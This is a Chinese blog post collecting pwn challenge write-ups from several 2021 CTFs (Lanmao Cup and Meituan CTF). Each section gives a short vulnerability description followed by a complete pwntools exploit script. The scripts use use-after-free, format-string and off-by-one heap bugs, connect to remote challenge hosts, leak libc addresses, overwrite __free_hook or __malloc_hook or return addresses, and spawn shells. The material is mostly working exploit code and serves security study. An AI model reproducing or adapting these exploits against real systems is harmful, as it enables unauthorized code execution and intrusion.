2021-XCTF-final线下\蓝帽杯线上\美团CTF题解

字数统计: 1.8k字   |   阅读时长≈ 10分

5月几场重要比赛的题解

2021-蓝帽杯线上

portable

程序分析

程序漏洞有点少见,在于 swicth-case 没有加入 default选项。导致可以实现一个 UAF漏洞。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
from pwn import *

context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', "-h"]
context.arch='arm'
file_name = './vuln'
local = 0
if local == 1:
    # context.binary = './vuln'
    # cmd=''
    # cmd += "set solib-search-path ./ \n"
    # cmd += 'b *$rebase(0xF8C)\n'
    # p = gdb.debug(context.binary.path)
    p = process(['qemu-arm-static', '-L', './', '-g', '1234',file_name])
    #p = process(['qemu-arm-static', '-L', './',file_name])
    # lb=ELF("./libc.so.6")
    libc = ELF('./libc.so.6')
else:
    p = remote('8.140.177.7', 14242)
    libc = ELF('./libc.so.6')

def create(k, size, name='aaaaaaaa'):
    p.sendlineafter(">> ", '1')
    p.sendlineafter("which player job do you want to choose?", str(k))
    if k > 3:
        return
    p.sendlineafter("name size?", str(size))
    p.recvuntil("user name?")
    p.send(name)


def dlt(idx):
    p.sendlineafter(">> ", '2')
    p.sendlineafter("index?", str(idx))


def show(idx):
    p.sendlineafter(">> ", '3')
    p.sendlineafter("index?", str(idx))
# pause()
gadgets = []
create(1, 0x20)

pay = p32(0)+p32(0x1000)+p32(0x10000)*6
create(1, 0x20, pay)
dlt(0)
dlt(1)

create(4, 0x30)
#sleep(2)
create(4, 0x30)

# show(0)
show(1)

p.recvuntil("player name: ")
heap = u32(p.recvuntil('\n')[:-2].ljust(4, b'\x00'))
print("heap:", hex(heap))

create(1, 0x20)  # 2
show(1)

for i in range(4):
    create(1, 0x20)
for i in range(4):
    dlt(i+3)

dlt(2)
create(1,0x300)#2

show(1)
p.recvuntil("player name: ")
libc_addr = u32(p.recvn(4))

print("libc:", hex(libc_addr))
# p.sendlineafter(">> ", '4')
print("puts_addr:", hex(libc.sym['puts']))
libc_base = libc_addr - 0x13a870
print("libc_base:",hex(libc_base))

system = libc_base+libc.sym['system']
read_addr = libc_base+libc.sym['read']
free_hook = libc_base+libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
print("fre:",hex(free_hook),hex(system),hex(read_addr),hex(malloc_hook))
#gadget = gadgets[0]+libc_base
# create(1, 0x50) #3
print("double free")
#raw_input()
create(1, 0x20)    #3
create(1, 0x20)    #4
create(1, 0x20)    #5
create(1, 0x20)    #6
print("free 4")
dlt(6)
create(4, 0x20)    #6
create(1, 0x20)    #7
dlt(6)
dlt(7)
dlt(3)
#create(4, 0x100)    #8
#dlt(8)
print("double free ok")
payload = p32(free_hook)
create(4, 0x100)
create(1, 0x20, payload)
create(1, 0x100, '/bin/sh')
#create(1, 0x0, payload)
create(1, 0x20, p32(system))

dlt(7)

p.interactive()

chall

烂题,在 i春秋,至少做4次了。

2021-蓝帽杯线下

hangman

程序分析

典型的 格式化字符串漏洞,需要注意输入的字符会决定输入的长度。

利用分析

利用格式化字符串漏洞泄漏栈地址和libc地址,然后修改 main函数的返回地址为 one_gadget即可。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])

file_name = './pwn'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 0
if debug == 1:
    p = process(file_name)
    elf = ELF(file_name)
    libc = ELF(libcname)
else:
    p = remote('118.190.62.234', 33445)
    libc = ELF('./libc-2.23.so')


gadgets = [0x45226, 0x4527a, 0xf03a4, 0xf1247]

def guess(payload):
    for i in list(payload):
        p.sendlineafter('Guess a letter:', i)

def game(payload):
    p.sendlineafter('Enter a word:', payload)

def Pwn():
    payload = '%29$p'
    p.sendlineafter('Enter a word:', payload)
    guess(payload)
    p.recvuntil(str(payload[:-1]))
    p.recvuntil(str(payload[:-1]))
    p.recvuntil('Guess a letter:')
    ret = int(p.recv(14), 16)
    libc_base = ret - 240 - libc.sym['__libc_start_main']

    print('ret_addr:',hex(ret))
    print('base:',hex(libc_base))

    gadget = gadgets[0]+libc_base

    payload = '%16$p'
    game(payload)
    for i in range(len(payload)):
        p.sendafter('Guess a letter:', '%')

    addr = p.recvuntil("\nYou win!")
    ls = len("\nYou win!")
    stack_addr = int(addr[-ls-14:-ls], 16)-0xd8
    print(hex(stack_addr))

    p.send(' ')

    lowAddr = gadget & 0xffffffff
    highAddr = gadget >> 32
    addr1 = lowAddr & 0xffff
    addr2 = lowAddr >> 16
    addr3 = highAddr

    # gdb.attach(p, 'bp $rebase(0x1442)')
    payload = '%'+str(addr1)+'c%14$hn'
    payload = payload.ljust(0x10-1, 'a')
    payload += '\x01'
    payload += p64(stack_addr)
    game(payload)
    for i in range(len(payload)-1):
        p.sendafter('Guess a letter:', b'\x01')

    #gdb.attach(p, 'bp $rebase(0x1442)')
    payload = '%'+str(addr2)+'c%14$hn'
    payload = payload.ljust(0x10-1, 'a')
    payload += '\x01'
    payload += p64(stack_addr+2)
    game(payload)
    for i in range(len(payload)-1):
        p.sendafter('Guess a letter:', b'\x01')

    p.interactive()
Pwn()

cover

程序分析

可以对程序代码段进行一个任意地址写。修改 call为调用 system地址。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])

file_name = './pwn'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 0
if debug == 1:
    p = process(file_name)
    elf = ELF(file_name)
    libc = ELF(libcname)
else:
    p = remote('118.190.62.234', 12435)
    #libc = ELF('./libc.so.6')

def Pwn():
    #gdb.attach(p, 'bp 0x804872b')
    p.sendafter('pwn this\n', p32(0x8048792)+p8(0x4a))

    p.sendafter('your name?', '/bin/sh\x00')

    p.interactive()

Pwn()

2021-美团CTF

nullheap

程序分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
unsigned __int64 add()
{
  _BYTE idx[12]; // [rsp+4h] [rbp-1Ch]
  char buf[8]; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Where?");
  *(_QWORD *)idx = (unsigned int)get_num();
  if ( *(_DWORD *)idx < 0 || *(_DWORD *)idx > 15 || heaparray[*(signed int *)idx] == (_BYTE *)&dword_0 + 1 )
  {
    puts("Index Error");
    exit(0);
  }
  printf("Big or small??");
  read(0, buf, 8uLL);
  *(_QWORD *)&idx[4] = atoi(buf);
  if ( *(_QWORD *)&idx[4] <= 0x1FuLL )
  {
    puts("Size Error");
    down();
  }
  if ( *(_QWORD *)&idx[4] > 0x200uLL )
  {
    puts("Size Error");
    down();
  }
  heaparray[*(signed int *)idx] = (const char *)malloc(*(size_t *)&idx[4]);
  memset((void *)heaparray[*(signed int *)idx], 0, 0x10uLL);
  if ( !heaparray[*(signed int *)idx] )
  {
    puts("Add Error");
    exit(2);
  }
  sizearray[*(signed int *)idx] = *(_DWORD *)&idx[4];
  printf("Content:", 0LL);
  read_input((void *)heaparray[*(signed int *)idx], *(_QWORD *)&idx[4] + 1LL);// off-by-one
  printf("Your input:", *(_QWORD *)&idx[4] + 1LL);
  printf(heaparray[*(signed int *)idx]);
  return __readfsqword(0x28u) ^ v3;
}

add函数中存在一个 off-by-one漏洞,利用堆重叠劫持 malloc_hooksystem地址即可。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# encoding=utf-8
import syslog
from pwn import *

file_path = "./nullheap"
context.arch = "amd64"
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF(file_path)
debug = 0
if debug:
    p = process([file_path])
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('114.215.144.240',11342)
    libc = ELF('./libc-2.23.so')


gadgets = [0x4f365, 0x4f3c2, 0x10a45c, 0xf1207]
def Add(idx, size, content):
    p.sendlineafter('Your choice :', str(1))
    p.sendlineafter('Where?', str(idx))
    p.sendlineafter('Big or small??', str(size))
    p.sendafter('Content:', content)

def Del(idx):
    p.sendlineafter('Your choice :', str(2))
    p.sendlineafter('Index:', str(idx))

def Pwn():
    payload = 'a'*0xf0
    Add(0, 0xf8, payload)
    Add(1, 0xf8, payload)
    Add(2, 0xf8, payload)
    Add(3, 0xf8, payload)
    Add(4, 0xf8, payload)

    Del(2)
    payload = 'a'*0xf0+p64(0x300)+'\x00'
    Add(2, 0xf8, payload)
    Del(0)
    #gdb.attach(p, 'bp $rebase(0x104d)')
    Del(3)

    Add(0, 0x90, 'a'*0x70)
    payload = 'a'*0x50+p64(0)+p64(0x101)
    Add(3, 0x70, payload)
    payload = (p64(0x0)+p64(0x21))*5
    Add(5, 0x50, payload)
    payload = (p64(0x0)+p64(0x21))*7
    Add(6, 0x70, payload)
    Del(3)
    Del(1)
    Add(3, 0x70, 'a'*0x60)
    p.recvuntil('a'*0x60)
    libc_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
    libc_base = libc_addr-0x10-88-libc.sym['__malloc_hook']

    system_addr = libc_base+libc.sym['system']
    free_hook = libc_base+libc.sym['__free_hook']
    malloc_hook = libc_base+libc.sym['__malloc_hook']
    print(("libc_base:",hex(libc_base),hex(system_addr)))
    gadget = gadgets[2]+libc_base
    puts_addr = libc_base+libc.sym['puts']
    sleep_addr = libc_base+0xcc2b0

    Del(3)
    payload = 'a'*0x50+p64(0)+p64(0x71)
    Add(3, 0x70, payload)
    Add(1, 0x68, 'a'*0x8+p64(0x61))  #chunk1
    Del(1)
    Del(3)
    payload = 'a'*0x50+p64(0)+p64(0x71)+p64(malloc_hook-0x23)
    Add(3, 0x70, payload)
    Add(1, 0x68, '/bin/sh\x00')
    #print('sleep:',hex(sleep_addr))
    Add(7, 0x68, 'a'*0x13+p64(sleep_addr))

    #gdb.attach(p, 'bp $rebase(0x104d)')
    p.sendlineafter('Your choice :', str(1))
    p.sendlineafter('Where?', str(8))
    p.sendlineafter('Big or small??', str(0x30))

    p.interactive()

Pwn()

worldplay

当创建堆块的内容写为如12344321这样的形式的时候,在play的时候会出现offset by null的漏洞,利用unlink consolidate进行堆块合并造成堆重叠,泄漏libc,修改__free_hooksystem获得shell

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
local = 0
if local == 1:
    p = process('./chall')
    lb = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    rdi, rsi, rdx, rax = 0, 0, 0, 0
    syscall = 0
    gadgets = []
else:
    p = remote('114.215.144.240', 41699)
    lb = ELF('libc-2.27.so')
    rdi, rsi, rdx, rax = 0, 0, 0, 0
    gadgets = []
    syscall = 0


def add(size, con):
    p.sendlineafter(">>> ", '1')
    p.sendlineafter("Input len:", str(size))
    p.sendafter("Input content:", con)


def dlt(idx):
    p.sendlineafter(">>> ", '2')
    p.sendlineafter("Input idx:", str(idx))


def play(idx):
    p.sendlineafter(">>> ", '3')
    p.sendlineafter("Input idx:", str(idx))


def exit():
    p.sendlineafter(">>> ", '4')


def ss(cn):
    ret = b''
    for i in range(cn):
        ret += p8(i)
    for i in range(cn):
        ret += p8(cn-1-i)
    return ret


# gdb.attach(p)

for i in range(8):
    add(0xf0, con='a'*0xf0)
for i in range(3):
    add(0xf0, con='a'*0xf0)
pay = ss(0xf8//2)
pay = p64((0x00040000) << 32)+pay[8:0xf0]+p64(0x0400)
add(0xf8, pay)

dlt(0)
dlt(1)
dlt(2)
dlt(3)
dlt(5)
dlt(6)

dlt(7)
dlt(4)

play(11)
dlt(9)
dlt(8)

add(0xf0, con='a'*0xf0)  # 0
add(0xf0, con='a'*0xf0)  # 1
add(0x1f0, 0x1f0*b'a')  # 2
play(1)
p.recvuntil("Chal:\n")
libc = u64(p.recvn(6).ljust(8, b'\x00'))-0x3ebca0
print(hex(libc))

dlt(2)
fh = libc+lb.sym['__free_hook']
sys = libc+lb.sym['system']
pay = 0xf0*b'a'+p64(0)+p64(0x101)+p64(fh)*2
pay = pay.ljust(0x1f0, b'a')
add(0x1f0, pay)  # 2
add(0xf0, b'/bin/sh'.ljust(0xf0, b'\x00'))
add(0xf0, p64(sys))

dlt(3)

p.interactive()

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing